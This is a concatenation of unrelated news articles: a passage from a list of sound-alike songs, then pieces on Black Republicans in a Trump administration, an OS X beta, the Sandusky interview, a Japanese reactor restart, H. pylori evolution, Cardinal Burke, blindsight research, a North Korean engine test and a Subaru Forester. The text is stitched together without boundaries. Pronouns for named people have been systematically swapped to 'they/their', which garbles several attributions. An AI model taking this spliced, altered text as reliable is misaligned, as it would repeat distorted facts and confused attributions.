“Halo” and “Already Gone” have such similar arrangements, seven years could have separated them and people would have still noticed how alike they sound. Unfortunately for Kelly Clarkson, their single was released a mere seven months after “Halo,” making the similarity that much more glaring. “Already Gone” sparked a public feud between Clarkson and Ryan Tedder, who co-wrote both songs, and they were equally furious with their label for releasing the song after they discovered the resemblance. Tedder dismissed the complaints, saying the songs were totally different and that they would never be so stupid as to pen twin tunes for two huge pop stars. If you say so, Tedder. [Joshua Alston]
Advertisement
4. Wire, “Three Girl Rhumba” (1977) and Elastica, “Connection” (1994)
Rock radio in the grunge era opened up to previously unwelcome genres like punk and post-punk, which meant that a lot of what sounded fresh and new in the early 1990s was actually a more polished version of music from 10 or 15 years earlier. But as cool as it was to hear the riff from a Wire song blasting from car stereos and sports arenas circa 1995, Elastica's unconscious (?) homage to “Three Girl Rhumba” in its international hit single “Connection” crossed the line from throwback to ripoff. Elastica eventually agreed to an out-of-court settlement with Wire for “Connection,” then gave the band another pile of money to legally sample the song “Lowdown” for a track on the 2000 LP The Menace. [Noel Murray]
Advertisement
5. Bon Jovi, “Livin' On A Prayer” (1986) and Belinda Carlisle, “Heaven Is A Place On Earth”
To be fair to Belinda Carlisle—and to “Heaven Is A Place On Earth” co-writers Rick Nowels and Ellen Shipley—the major-label hit factory is incestuous and trend-driven, which could very well explain how a song with a near-identical structure and melody to Bon Jovi's “Livin' On A Prayer” could hit No. 1 on the Billboard pop charts nine months after the Jon Bon Jovi/Richie Sambora/Desmond Child composition did the same. (“Professional courtesy” may also explain why no lawsuits were filed.) Still, for Top 40 radio-listeners in the late 1980s, the similarities between the two songs led to more than a little confusion, as rocker dudes everywhere would pump their fists excitedly for a few seconds before realizing they were listening to an ex-Go-Go. [Noel Murray]
Advertisement
6. Bauhaus, “Dark Entries” (1980) and Hole, “Mrs. Jones” (1991)
Courtney Love has long been accused of taking all their good ideas from ostensibly more talented men, including Kurt Cobain and Billy Corgan. It's an inherently sexist argument, but one Love reinforced with “Mrs. Jones,” from Hole's debut album, which borrows the descending guitar riff from Bauhaus' “Dark Entries.” The Hole song is technically built on a Bauhaus “sample,” though the writing credits don't reflect that, and Love has been transparent about their love of Bauhaus. But even the most generous punk-rock interpretation does little to repair Love's reputation for plagiarism. [Joshua Alston]
7. T. Rex, “Ride A White Swan” (1970) and Morrissey, “Certain People I Know” (1992)
Morrissey is a well documented T. Rex fan; not only is The Smiths' “Panic” something of an homage to “Metal Guru,” but Morrissey has also hinted that the star they were pining for in “Paint A Vulgar Picture” was Marc Bolan. Their love has never been more overt than on “Certain People I Know,” which glides along the same little rockabilly-inspired lick as T. Rex's 1970 hit “Ride A White Swan.” You can also hear Morrissey honking a little bit at the end, as if to acknowledge the bird. [Josh Modell]
Advertisement
8. Suicidal Tendencies, “I Saw Your Mommy” (1983) and Puddle Of Mudd, “She Hates Me” (2001)
As a forerunner in the '80s crossover thrash scene, Suicidal Tendencies' legacy is tied to its breakout hit, “Institutionalized.” While it's remained an influence in the metal world, that crossover status was truly achieved when in 2001 the chord progression from “I Saw Your Mommy” turned up in Puddle Of Mudd's “She Hates Me.” There are differences between the tracks—the self-proclaimed “cycos” in Suicidal go into warp speed midway through—but “She Hates Me” rides the same tempo and progression throughout, driving home the similarities at every turn. [David Anthony]
Advertisement
9. Rae Sremmurd, “Safe Sex Pay Checks,” (2013) and Alley Boy (Featuring Ty$), “RNGM” (2015)
Despite having a golden chorus from hook man Ty$, rapper Alley Boy wasn't able to score a hit with their 2013 contender “RNGM,” but considerable elements from that track were lifted for a song that still has a chance of becoming one. The youthful rap duo Rae Sremmurd closes its debut album SremmLife with “Safe Sex Pay Checks,” a likely single that glides on a similarly stuttery electronic beat and borrows the same unmistakable melody; even the rhythmic pauses land at the same time. The most substantial difference between the two is the energy level. Where Ty$ mutters their chorus with cool indifference, Rae Sremmurd dials up its chorus into a rowdy party chant. [Evan Rytlewski]
10. Spoon, “I Turn My Camera On,” (2005) and Aranda, “All I Ever Wanted” (2008) and Kelly Clarkson, “All I Ever Wanted” (2010)
When Kelly Clarkson's All I Ever Wanted was released in 2009, it had been a few years since Spoon's Gimme Fiction, and that album's “I Turn My Camera On.” Clarkson has always incorporated rock into their pop, more so than many similar artists, though in this case, it sounds less incorporated than baldly appropriated. But while the logical assumption would be that some enterprising young producer didn't do as good a job as they should have reworking Spoon's verses into something new, it turns out that it was actually a cover—the song was written by Oklahoma rock group Aranda, who released it the year before Clarkson's title track. So if anyone may be biting Spoon's style, it's not Kelly—at least not directly. However, both versions deviate significantly during the choruses, which probably explains why Spoon didn't feel the need to make a big thing of it. [Alex McCown]
Advertisement
11. Huey Lewis And The News, “I Want A New Drug” (1983) and Ray Parker Jr., “Ghostbusters” (1984)
Ray Parker Jr. claims they were only given a few days in which to write the irresistible theme song for Ghostbusters, a song that was nominated for an Oscar and knocked “When Doves Cry” from the top spot on the Billboard chart. The rush job may have been necessary because the film's producers had already been turned down by Huey Lewis and Lindsey Buckingham, who both claim they were approached before Parker. They got the next best thing to Lewis, however, as Parker's tune shares a bass line and a fair amount of melody with “I Want A New Drug,” the News' hit from the previous year. Lewis sued over the similarity and won, although Parker later sued Lewis for discussing the terms of the confidential settlement. [Mike Vago]
12. Tom Petty, “Last Dance With Mary Jane” (1993) and Red Hot Chili Peppers, “Dani California” (2006)
Tom Petty is consistently wrapped up in sound-alike comparisons; you might start to think he's the originator of most rock and pop melodies. After all, he's apparently influenced everyone from Sam Smith to The Strokes, who admitted to ripping off the riff from “American Girl” for “Last Nite.” When the Red Hot Chili Peppers released “Dani California” in 2006, it didn't take long for many listeners to notice a similarity between that song's melody and the one Petty used on “Last Dance With Mary Jane.” The minor chord progressions are very similar (thought not exactly the same), and the staccato delivery of the vocals by Anthony Kiedis even seems to mimic Petty's. While news of a lawsuit floated around for some time, Petty ultimately played the situation like the cool rock dad they are, telling Rolling Stone that “there are enough frivolous lawsuits in this country without people fighting over pop songs.” [Kyle Fowle]
Advertisement
13. Madonna, “Express Yourself” (1989) and Lady Gaga, “Born This Way” (2011)
If Lady Gaga was going to intentionally rip off anyone for their LGBT anthem “Born This Way,” you'd think they would know better than to rip off Madonna. (It's Madonna. Folks are going to notice.) Gaga has acknowledged Madonna's influence on their music, and on the public image that is half of a pop singer's allure. But the line between homage and ripoff can be a fine one, especially here—Gaga's beat is a glitchier, sped-up version of Madonna's, and the melody, while not exactly the same, is suspiciously Madonna-esque. (There's some “Vogue” in there, too.) The influence is especially obvious in the chorus and in the spoken-word segments of the song, which recall Madonna's “Come on girls! Do you believe in love?” exhortation at the beginning of “Express Yourself.” Rather than address the similarities in court, Gaga and Madonna let their feud play out onstage in the form of passive-aggressive mashups and catty asides about things being “really different now than they were 25 years ago,” proving that these divas have more in common than just melodies. [Katie Rife]
14. The Kinks, “All Day And All Of The Night” (1964) and The Doors, “Hello, I Love You” (1968)
Ray Davies may be the most affable victim of riff theft on this list, having long laughed off the fact that The Doors' “Hello I Love You” borrows heavily from The Kinks' “All Day And All Of The Night”—even sometimes cheekily inserting Jim Morrison's lyrics into live performances of the song. Of course, it's easy to laugh when you're getting paid: Despite guitarist Robby Krieger's insistence that they were actually inspired by Cream, U.K. courts determined the two songs to be so similar that The Doors had to pay all of its “Hello, I Love You” royalties to Davies. [Sean O'Neal]
Advertisement
15. The Kinks, “Picture Book” (1968) and Green Day, “Warning” (2000)
What's perhaps most interesting about the similarity between The Kinks' “Picture Book” and Green Day's “Warning”—they essentially share the same bass-led melody—is that nobody with The Kinks ever got involved with a lawsuit. In fact, an unsigned, obscure English rock band by the name of The Other Garden decided that it was way more likely that Green Day had ripped them off, rather than stealing from one of the most popular, influential rock bands of all time. For a brief time, The Other Garden threatened a lawsuit and pushed to have the royalties on “Warning” frozen. That lawsuit was swiftly dropped though, and The Other Garden went back to being a band nobody has ever heard of. [Kyle Fowle]
16. Oasis, “Wonderwall” (1995) and Green Day, “Boulevard Of Broken Dreams” (2004)
“They should have the decency to wait until I'm dead,” Noel Gallagher told Stuff magazine when asked about the suspicious similarities between their own 1995 hit “Wonderwall” and Green Day's melancholic, decade-later smash “Boulevard Of Broken Dreams.” The Oasis frontman wasn't the only one to pick up on the nearly identical chord progression: San Francisco DJ Party Ben scored a minor radio hit with their mash-up “Boulevard Of Broken Songs,” which laid Billie Joe Armstrong's vocals over the acoustic strum of Gallagher's guitar and Gallagher's vocals over the crunch of Armstrong's electric. (The song also shrewdly worked in samples from Travis' “Wonderwall”-quoting “Writing To Reach You” and Eminem's “Dream On”-sampling “Sing For The Moment.”) The irony of the accusation—however founded it may be—is that Gallagher has spent much of their career dodging copycat charges of their own, with many still insisting that their former arena-rock outfit is just a bad Beatles clone. [A.A. Dowd]
The surprise victory of reality-TV star and business person Donald Trump will mean positions of power for one of the loneliest segments of the Grand Ol' Party: black Republicans, long vilified as being political "traitors to the race."
The pressure on black Republicans who helped Trump win the presidential election was even more intense than normal this political cycle given Trump's stereotyping of black communities as violent, their father's housing discrimination and Trump's continual vilification of the Central Park Five. Even with all of that, 8 percent of African Americans voted for Trump, 2 percentage points more than for Mitt Romney in 2012.
Supporting Trump was viewed as a waste of time and a suicide mission, views that appeared to be backed up in polls showing their black support at zero in some cities. But with Trump's predicted-by-nobody victory, there are some African-American supporters almost certain to find themselves in positions of power.
Some names you can expect to pop up as the Trump administration chooses staff and members of the Cabinet are Milwaukee County Sheriff David Clarke, CNN political analyst Paris Dennard, Republican National Committee outreach fellow Leah LeVell, Thurgood Marshall College Fund President and CEO Johnny Taylor, and Bob Woodson, founder and president of the Center for Neighborhood Enterprise.
What job each person would occupy is hard to identify in such early stages, but there are more than 1,800 jobs to fill as part of the Executive Office of the President, and filling them will take months.
Advertisement
One name you won't see is Dr. Ben Carson, who pulled their name from consideration for a Cabinet position because they felt they were unqualified. But here's a list of 10 of the most obvious African Americans who worked to elect Trump who are likely to serve in their administration.
Lauren Victoria Burke is a Washington, D.C.-based political reporter who writes the Crew of 42 blogs. They appear regularly on NewsOne Now with Roland Martin on TV One. Follow them on Twitter.
1. Ken Blackwell
Advertisement
Former Cincinnati Mayor Ken Blackwell is said to be in charge of domestic policy on the Trump transition team. Blackwell also was an undersecretary at the Department of Housing and Urban Affairs under President George H.W. Bush for a year.
2. Elroy Sailor
Advertisement
A senior adviser to Republican National Committee Chairman Reince Priebus and a veteran of the presidential campaign of Sen. Rand Paul (R-Ky.), Sailor is a well-known and well-connected Republican operative who has also served in the House leadership office of former Rep. J.C. Watts.
3. Kay Coles James
Advertisement
James served as director of the Office of Personnel Management under President George W. Bush from 2001 to 2005 and was a former dean of Regent University's Robertson School of Government. They also held the job of secretary of health and human resources in Virginia under former Republican Gov. George Allen.
4. Ashley Bell
Advertisement
Bell is a former county commissioner in Hall County, Ga., who is well-versed in local politics, communications and community outreach. They have been operating as the senior strategist and national director for African-American engagement for the RNC since August, the highest-ranking African American in the GOP campaign for the White House.
5. Telly Lovelace
Advertisement
Lovelace has been a veteran GOP communications strategist (he's the former managing director of IR+Media) and became the leader of the RNC's black political engagement at one of the most difficult times in the 2016 presidential campaign: right after the mass exit of black staffers from the RNC when it became clear that Trump would win the GOP nomination.
6. Bruce LeVell
Advertisement
The executive director of the National Diversity Coalition for Trump is a business person from Georgia who might be an interesting choice to head the Small Business Administration, which gave less than 2 percent of its loans to African-American businesses under the Obama administration. LeVell would also be a shoo-in for any position in a Trump administration that requires coalition building.
7. Lynne Patton
Advertisement
Patton is the vice president of the Eric Trump Foundation and handles all of the foundation's events and social media. They also have been a defender of the Trump family against accusations of racism and probably is best-known for releasing a video in which they tearfully expressed their devotion to the Trump family. Patton is the closest African-American adviser to the Trump family.
8. Omarosa Manigault
Advertisement
The former Apprentice star is bound to have a position in the Trump administration; the question is, what will it be? Manigault served as Trump's director of African-American outreach at a time when no one believed Trump would get any African-American support.
9. Katrina Pierson
Advertisement
Pierson was the often-seen public face of the Trump campaign on cable news from the very beginning. It's likely that the Trump administration will need their "take no prisoners" style of communication as someone who will unflinchingly and wholeheartedly stand up for Trump's decisions, just as they did during the campaign.
10. Gerard Robinson
Advertisement
Robinson is an education-policy expert at the American Enterprise Institute. Their focus has been on school choice, the role of for-profit institutions in education and HBCUs.
Apple today seeded the second beta of an upcoming OS X 10.11.6 beta to public beta testers, one day after releasing the second OS X 10.11.6 beta to developers. OS X 10.11.6 has been in testing since May 23 and the second beta comes three weeks after the public release of OS X 10.11.5 , the fifth update to the El Capitan operating system.Beta 2 is available through the Software Update mechanism in the Mac App Store for those who are enrolled in Apple's beta testing program. Mac users who want to join the program can sign up on Apple's beta testing website OS X 10.11.6, like most of the previous updates to the El Capitan operating system, appears to be minor in scale, focusing mainly on bug fixes and security improvements that are not immediately obvious to testers and developers. No outward-facing changes or major bug fixes were discovered in the first two developer betas.
Image caption Jerry Sandusky is facing 40 criminal charges
The former Penn State football coach at the centre of a child abuse inquiry that has shocked the US has admitted in an interview showering with young boys, but denies being a paedophile.
Jerry Sandusky told NBC News that they had "horsed around with kids", hugged them and touched their legs, but was innocent of the charges against him.
In a phone interview, they said they should not have showered with the children.
Mr Sandusky, 67, is accused of abusing at least eight boys over 15 years.
According to grand jury testimony, a witness saw them raping a boy as young as 10 in the Penn State showers in 2002.
'Sexually attracted?'
In an interview with NBC News' Rock Center programme broadcast on Monday night, Mr Sandusky said: "I have horsed around with kids. I have showered after workouts.
"I have hugged them and I have touched their legs without intent of sexual contact."
When asked if they had done anything wrong, they said: "I shouldn't have showered with those kids."
Asked if they were a paedophile, they said: "No".
The former defensive co-ordinator for the Penn State Nittany Lions was also asked if they felt sexual attraction to under-age boys.
"Sexually attracted?" Mr Sandusky said. "You know, I enjoy young people. I love to be around them. But no, I'm not sexually attracted to young boys."
In an interview with CNN on Monday evening, Mr Sandusky's lawyer, Joe Amendola, described their client as a "big overgrown kid" and said athletes have a culture of showering together.
Mr Amendola said their client had been "destroyed" by the charges - that bricks had been thrown through the windows of theirs home.
The lawyer added: "We have an answer for every allegation."
Mr Sandusky was formerly assistant to Penn State head coach Joe Paterno, who was fired last week amid criticism they did not do enough about the allegations.
On Monday, Mr Paterno's name was taken off the Stagg-Paterno Championship Trophy, also known as the Big Ten.
Meanwhile, the president of Mr Sandusky's charity for disadvantaged children resigned. Jack Raykovitz said they hoped their exit would help restore faith in the organisation.
Mr Sandusky - who was arrested a week ago - allegedly groomed victims through the Second Mile, which they founded in 1977.
They retired from Penn State in 1999, but continued to use the university's facilities for their work with the charity.
It emerged on Sunday that the judge who granted Mr Sandusky unsecured bail had donated to the charity and worked as a volunteer for the group.
State College District Judge Leslie Dutchcot did not immediately respond to questions about whether they would recuse themselves from the case.
The Penn State scandal also claimed the job last week of the university's president, Graham Spanier.
Meanwhile, Penn State athletic director Tim Curley and senior vice-president Gary Schultz deny charges they covered up the alleged abuse.
This article is over 3 years old
Number-two reactor at Sendai has gone on line more than four years after a quake-sparked tsunami swamped a plant at Fukushima
Japan on Thursday restarted a second nuclear reactor after a shutdown triggered by the 2011 Fukushima crisis, as the government pushes to return to a cheaper energy source despite widespread public opposition.
Utility Kyushu Electric Power said it restarted the number-two reactor at Sendai, about 1,000 kilometres (620 miles) southwest of Tokyo at 10.30am (0130 GMT).
The same power plant's number-one reactor was restarted in August, ending a two-year nuclear power hiatus.
Safe at last? View from Naraha – the first Fukushima community declared fit for humans Read more
Engineers will now spend several days bringing the newly restarted reactor up to operational level before running it commercially from November.
The restart comes more than four years after a quake-sparked tsunami swamped cooling systems and triggered reactor meltdowns at the Fukushima plant, prompting the shutdown of Japan's 50 reactors and starting a pitched battle over the future use of atomic power.
Prime Minister Shinzo Abe has pushed for a restart, arguing that atomic energy is necessary to power the world's third biggest economy.
But the public is largely opposed to atomic energy after the Fukushima crisis sent radiation over a wide area and forced tens of thousands from their homes – many of whom will likely never return – in the worst nuclear accident since Chernobyl in 1986.
The government will continue to restart reactors that are deemed safe under the nation's standards, upgraded since the Fukushima accident in 2011, said Chief Cabinet Secretary Yoshihide Suga.
“There is no change to this policy of the government,” Suga told a press conference.
About 70 people gathered in front of the Sendai plant to protest the latest reactor restart, according to public broadcaster NHK.
“Many people are still concerned about the restart of nuclear power plants,” Ryoko Torihara, head of the citizen group against the Sendai nuclear plant, told NHK.
Campaign group Greenpeace criticised “the Abe government's disregard for public safety,” and argued that Japan has demonstrated that it does not need nuclear power.
“Nuclear energy will not make any significant contribution to Japan's energy mix – not now or in the foreseeable future,” said Mamoru Sekiguchi, energy campaigner at Greenpeace Japan.
“Rather than risking the safety of Japanese citizens for a dangerous and outdated energy source, the Japanese government should be creating policies that support the transition to safe, clean renewable energy,” they said.
The government temporarily restarted the Oi nuclear reactors in 2012 to prevent power shortage in the central Kansai region, but they stopped operations for inspections in September 2013.
Bacteria that cause ulcers in humans undergo accelerated evolution during the initial stages of infection, allowing them to evade the immune system, according to new research by an international team of researchers including Penn State scientists. The study shows, for the first time, and in real-time, the interplay between the human immune system and invading bacteria that allows the bacteria to counter the immune response by quickly evolving. A paper describing the research is published in the 13 June 2014 issue of the journal Nature Communications.
"Our next-generation sequencing approach enabled, for the first time, the tracing of Helicobacter pylori infections in human patients," said Stephan Schuster, professor of biochemistry and molecular biology at Penn State.
The scientists compared the genome sequence of the stomach bacterium Helicobacter pylori just prior to infection and at several time points after infection. "We were blown away by the very high mutation rate that we found during the initial phase of infection," said Bodo Linz, research associate at Penn State and lead author of the paper. Patients infected with H. pylori, experience an initial, acute phase of infection during which symptoms are most severe and the immune response is strongest. "We found that the bacteria accumulated mutations at a rate 30 to 50 times faster during this acute phase than during the later, chronic phase of infection when an equilibrium was reached between the bacteria and the immune response," Linz said.
Although the rate at which mutations accumulate in the genome of H. pylori during the chronic phase of infection had been determined previously, no one yet had looked at the initial, acute phase because it is so difficult to capture and sequence the bacteria at the time of initial infection.
To determine the mutation rate during this early phase, the research team took two approaches. First, the researchers isolated the bacteria from two previously-infected human volunteers and determined its genome sequence. After eradicating the bacteria from the volunteers through treatment with antibiotics, they then re-infected the now-cured patients with their own strain of H. pylori. At 20 days after infection in one case and at 44 days after infection in the other, the scientists again isolated the bacteria from the volunteers and sequenced its genome. The patients then received another antibiotic treatment to eliminate the bacteria. "By comparing the genome sequence of the bacteria before and after re-infection, we were able to determine the rate at which the bacterial genome changes during this early, acute phase of infection in a human host," said Linz.
In a parallel experiment, the team infected a rhesus monkey with H. pylori and collected samples of the bacteria from the monkey for genome sequencing at one week, one month, two months, and six months after initial infection. In the monkey, the scientists were able to directly compare the rate of DNA changes in the bacterial genome between the acute and chronic stages. Although mutations continued to accumulate in the bacterial genome during the chronic phase, the rate of substitutions dropped considerably after the initial four-week period.
An infection with H. pylori triggers an immune response that involves the release of reactive oxygen and nitrogen molecules that are known to induce mutations in the DNA sequence and to cause chromosomes to break apart and recombine. Previous studies had shown that the H. pylori genome is forgiving of this kind of abuse. "Strains of the bacterium isolated from different human hosts vary immensely, both in DNA sequence and in gene content" Schuster said. "There are about 1,100 core genes that individual strains of H. pylori share, but another four-to-five-hundred genes vary between strains. The high mutation and recombination rates that produce this variation allow the bacteria to be exquisitely adapted to its host and to evade eradication by the host's immune system."
Of particular importance in the battle between the immune system and invading bacteria are the proteins that protrude through the outer cell membrane of the bacteria. Because these outer-membrane proteins are on the outside of the bacterial cell, they are visible to the human immune system and therefore are targeted by antibodies. "Antibodies are so tuned to recognize the three-dimensional structure of outer-membrane proteins that they can attach to them with lock-and-key specificity, thereby labeling the foreign bacteria cell for elimination," said Linz. Mutations in the genes that code for outer-membrane proteins can produce changes in the protein's structure and, if the key then no longer fits the lock, the genetic mutations allow the bacterium to evade recognition by antibodies. "The intense selective pressure on the bacteria to survive the immune response, coupled with increased mutation rates, produces the incredibly fast rate of genomic change that we discovered in this study," Linz said. "Mutations occur randomly throughout the genome, but because they help the bacteria avoid elimination by the immune system, changes in outer-membrane proteins appear much more often than would be expected by chance in the surviving bacteria."
This initial burst of mutations during the acute phase of infection allows the bacteria to survive the host's immune response and to establish a chronic infection. Whether bacteria other than H. pylori undergo a similar burst of accelerated evolution immediately after infection is not yet known, but the team plans to investigate other common human pathogens in future research.
VATICAN CITY (RNS) American Cardinal Raymond Burke, the feisty former archbishop of St. Louis who has emerged as the face of the opposition to Pope Francis' reformist agenda, likened the Roman Catholic Church to “a ship without a rudder” in a fresh attack on the pope's leadership.
In an interview with the Spanish Catholic weekly Vida Nueva, published Thursday (Oct. 30), Burke insisted they were not speaking out against the pope personally but raising concern about their leadership.
“Many have expressed their concerns to me. At this very critical moment, there is a strong sense that the church is like a ship without a rudder,” Burke said.
“Now, it is more important than ever to examine our faith, have a healthy spiritual leader and give powerful witness to the faith.”
Burke is the current head of the Vatican's highest court known as the Apostolic Signatura, but they said recently they are about to be demoted. There is speculation they will be made patron of the Order of Malta, a largely ceremonial post.
“I have all the respect for the Petrine ministry and I do not want to seem like I am speaking out against the pope,” they said in the interview. “I would like to be a master of the faith, with all my weaknesses, telling a truth that many currently perceive.”
“They are feeling a bit seasick because they feel the church's ship has lost its way,” they added.
Burke has expressed an uncompromising stance on keeping the ban on Communion for Catholics who divorce and remarry without an annulment, and is one of five conservative cardinals who aired their views in a new book, “Remaining in the Truth of Christ,” released on the eve of the bishops' blockbuster synod in early October.
When the synod signaled a more welcoming tone to gay and lesbian Catholics, Burke publicly accused the global gathering of bias and was among those who pushed for a less conciliatory approach in the final report.
Burke had previously said that Catholic families should not expose children to the “evil” of homosexuality by inviting a gay son home for Christmas with their partner.
In their latest interview, Burke said the church was “the pillar of marriage” and challenged the pope's revolutionary “Who am I to judge?” remark on gay people.
“The acts must be judged; I do not think that the pope thinks differently. They are sinful and unnatural. The pope never said we can find positive elements in them. It is impossible to find positive elements in an evil act.”
KRE/AMB END McKENNA
Published online 28 September 2009 | Nature | doi:10.1038/news.2009.956
News
Out of sight is not out of mind for facial expressions or body language.
Partially blind people can 'unconsciously' sense the facial expressions of others. Punchstock
Two patients, partially blind because of damage to one side of their brain, were able to sense, and respond to, emotions expressed by people in pictures presented to their blind sides.
A study by an international team of researchers finds that the patients unconsciously twitched a facial muscle uniquely involved in smiling when a picture showed a happy person, and a muscle involved in frowning when the person depicted looked fearful1.
The patients, both from the United Kingdom, have the very rare condition known as partial cortical blindness. Their eyes are intact but they have damage to the visual cortex on one side of their brain. This means that they cannot process information from the visual field on the opposite side of their nose.
The scientists, who were led by Marco Tamietto and Beatrice de Gelder at Tilburg University in the Netherlands, say the results show that our spontaneous tendency to synchronize our facial expressions with those of other people in face-to-face situations — known as emotional contagion — occurs even if we cannot consciously see them.
"This is interesting evidence that we can recognize the emotions of others without needing to be visually aware of them," says neuroscientist Christian Keysers, an expert in the neurophysiology of emotion at the University of Groningen, the Netherlands, who was not involved in the study.
Second sight
The two patients were shown random mixtures of images of people looking happy or fearful, each for two seconds, in rapid succession. The pictures were presented on the side of their visual field that they could see, then on the side they could not consciously see. They were asked to press a button after each picture to indicate the emotion they had recognized, or guessed at.
“They could sense emotion through an unconscious mechanism, and resonate with it.” Marco Tamietto
Tilburg University
The scientists attached special electrodes to the patients' faces, allowing them to measure subtle contractions — of which we are usually unaware — of the tiny muscles involved in expressing emotion.
The patients twitched their smiling-specific zygomaticus major muscle when presented with happy pictures and the frowning-specific corrugator supercilii muscle when presented with fearful pictures. The response was the same whether the pictures were presented on the side they could see or the side they could not see. But the response was faster when the pictures were presented to the blind side — perhaps because there was no conscious emotional evaluation to delay things, says Tamietto.
"The subjects were not simply imitating the expression of others, because their faces responded whether the emotion was conveyed to them via facial expression or body language," they say. "They could sense emotion through an unconscious mechanism, and resonate with it."
Mixed picture?
Much of the visual input from the retina goes directly to the visual cortex, which processes the information so that we consciously perceive the image we are looking at. But a small part goes directly to the midbrain, through an evolutionarily primitive subcortical pathway that processes emotion and other information central to survival — and that is intact in the two patients.
ADVERTISEMENT
So it seems that emotional contagion can be implemented via evolutionarily ancient neural structures, says Tamietto, and does not necessarily require the involvement of higher brain regions, visual awareness or the mirror neurons that are active when we recognize the physical actions of others.
But Keysers cautions that it remains to be determined whether the subcortical and higher cortical pathways for recognizing emotions operate in parallel. Emotion recognition could use several types of available information, they say.
"Through this test, it is assessed that (North Korea) has made meaningful progress in engine performance, but further analysis is needed for exact thrust and its possible uses in future," said South Korean Defense Ministry deputy spokesperson Lee Jin-woo.
They said the equipment tested "appears to have one main engine with four auxiliary engines connected to it. We believe this was an attempt to develop a new engine."
Pyongyang, for its part, touted the test as a "great leap forward" in its rocket program.
Many analysts linked the timing of the test to US Secretary of State Rex Tillerson's first visit to north Asia , which ended in Beijing Sunday.
This undated picture released by North Korea's official Korean Central News Agency (KCNA) on March 19, 2017 shows the ground jet test of a newly developed high-thrust engine at the Sohae Satellite Launching Ground in North Korea.
Space program
According to the official North Korean news agency KCNA, the test measured the thrust power in the combustion chamber, the structural safety and reliability of the engine, and the movement of the turbine pipe.
The KCNA statement mentioned only civil, rather than military, purposes for the new engines, saying it would "help consolidate the scientific and technological foundation to match the world-level satellite delivery capability in the field of outer space development."
The engine was tested at the Sohae Satellite Launching Station, a major space facility on the country's northwest coast, from which North Korea successfully launched its first satellite into orbit in December 2012.
North Korea insists its space program is peaceful and focused on putting scientific satellites into orbit. However, analysts have long accused Pyongyang of using the program as a covert weapon testing scheme
"An ICBM variant of the Unha could be sufficiently similar to the space launch vehicle in that it would be very likely to succeed, making it a good candidate for a political demonstration even though the Unha would make for a poor missile."
China followed a similar path with its space and ballistic missile program beginning in the 1960s. Engines used in the Long March 2 satellite launcher were later repurposed for the "development of the DF-5 ballistic missile -- China's first true intercontinental range missile," according to David Wright , co-director of the Union of Concerned Scientists.
However, in a recent paper published in the journal Korea Observer, weapons experts Markus Schiller and Theodore Postol wrote that the potential for North Korea to repurpose a space rocket to deliver an ICBM "does not mean that North Korea has the ability, or is likely to have the ability, to use this postulated ICBM to materially threaten the United States with a nuclear attack."
"It is unlikely that North Korea now has a nuclear weapon that weighs as little as 1,000 kg (2,200 lb). It is also unlikely that such a first-generation nuclear weapon would be capable of surviving the unavoidable 50 G deceleration during warhead reentry from a range of nearly 10,000 kilometers (6,200 miles)," they wrote.
"This engine produces enough thrust for the first stage, possibly even the second stage, of a large ICBM," Michael Elleman of the US-based International Institute for Strategic Studies told CNN
Elleman said that the engine appeared "too large" for the ICBM prototypes that North Korea has demonstrated during military parades, but added "we think they could shrink it down and fit it onto either of the prototypes that they have paraded to date."
Rocketing forward
While in the past North Korea has been largely dependent on existing -- mostly Soviet and Chinese technology -- Schilling pointed out last year that "we have now seen that North Korea can build large rockets using both solid and high-energy liquid propellants, to their own requirements."
Space and security analyst Markus Schiller suggested on Twitter that the effusive press release put out by KCNA could indicate that "they are finally running their first indigenous engine."
Euan Graham, director of international security at Australia's Lowy Institute, said the North Korea's twin civilian and military rocket programs may have "become so sophisticated they're moving on separate tracks."
They cautioned against underestimating the country's capabilities, pointing to recent submarine launches . "I think a lot of people would have scoffed at the idea that a country of threadbare means like North Korea would be able to test (submarine-launched ballistic missiles)," they said.
JUST WATCHED Japan prepares for potential N. Korea attack Replay More Videos ... MUST WATCH Japan prepares for potential N. Korea attack 02:39
Display of force
The rocket engine test came hours before Tillerson met Chinese President Xi Jinping , and a day after America's top diplomat warned that all options -- including military action -- remained on the table when it came to dealing with North Korea.
Sunday's test was a "precisely-timed spectacular," said Peter Hayes, director of the US-based Nautilus Institute , "the kind we've come to expect from Kim Jong-un."
"(The test) was clearly aimed to put pressure on China and to expose the fecklessness of Tillerson's threat to somehow stop the regime," they said.
Graham added that the value of such testing for internal propaganda purposes should also not be ignored.
North Korea operates on a military-first principle , which Kim has increasingly shifted towards nuclear and weapons technology, and away from the traditional standing army.
"Let's not forget the ideological aspect of this," Graham said. "It's important to them to have this ability to demonstrate technological prowess."
You don't think of SUV's being sporty unless you look at the German performance lines, but Subaru is launching the new 2015 Forester 2.0XT that is a new sporty model for driving enthusiasts. It's not a Forester 2.0XT STI, but it does come with the new 2.0-liter turbocharged DIT engine that comes in the new 2015 WRX. This is the next best thing to getting a Forester that has been developed by STI. What does the new 2015 Forester “2.0XT EyeSight Advantage Line” feature?
It's a special edition Forester SUV model that will launch in the Japan market. But we'll likely see some variant of this sporty model here in the U.S. The special edition will launch in Japan on May 30, 2014. It will come with new upgrades both inside and out to set it apart from the standard Forester. Subaru says it brings a “premium feel to the performance of high-performance.”
In addition to the performance 2.0-liter turbo DIT engine, the 2015 Forester “2.0XT EyeSight Advantage Line” will feature interior and exterior goodies to set it apart. On the inside, this special edition will come with ultra suede leather on the door trim, steering wheel and seats. The instrument panel will get a special blue metallic decorative trim along with silver and black piano trim on the air conditioner rings. The seats, doors and center console also come with blue stitching.
Outside the 2015 Forester “2.0XT EyeSight Advantage Line” gets special exterior treatments. It will come with satin plated door mirrors, 18-inch aluminum wheels with a special high raster paint. Underneath, drivers will be treated to the new 2.0-liter horizontally opposed direct injection turbo (DIT) powerplant. This engine uses Subaru's latest technology and is a great performer. It will deliver superior performance in the Forester SUV package.
This new 2015 Forester will also come with Subaru's new-generation EyeSight safety system. EyeSight processes stereo images to identify vehicles traveling in front, any obstacles, traffic lanes and other potential hazards. Information is then relayed to the EyeSight computer, which is also networked with the car's braking system and electronic throttle control. It can even detect pedestrians in the vehicle's path and notify the driver. At speeds under 30 mph, Eyesight is able to bring the car to a complete stop, thus avoiding a collision.
There's nothing outside that announces what is underneath for performance enthusiasts. But this will be a sporty family hauler that will get the kids to soccer practice or to the ski slope quickly. Look for the all-new 2015 Forester “2.0XT EyeSight Advantage Line” to launch in Japan on May 30. Hopefully we'll get some version of the new special edition 2.0XT here in the U.S. and other global markets.
Other 2015 Subaru Forester stories of interest.
How 2015 Forester shows Subaru will be number one brand in two key areas
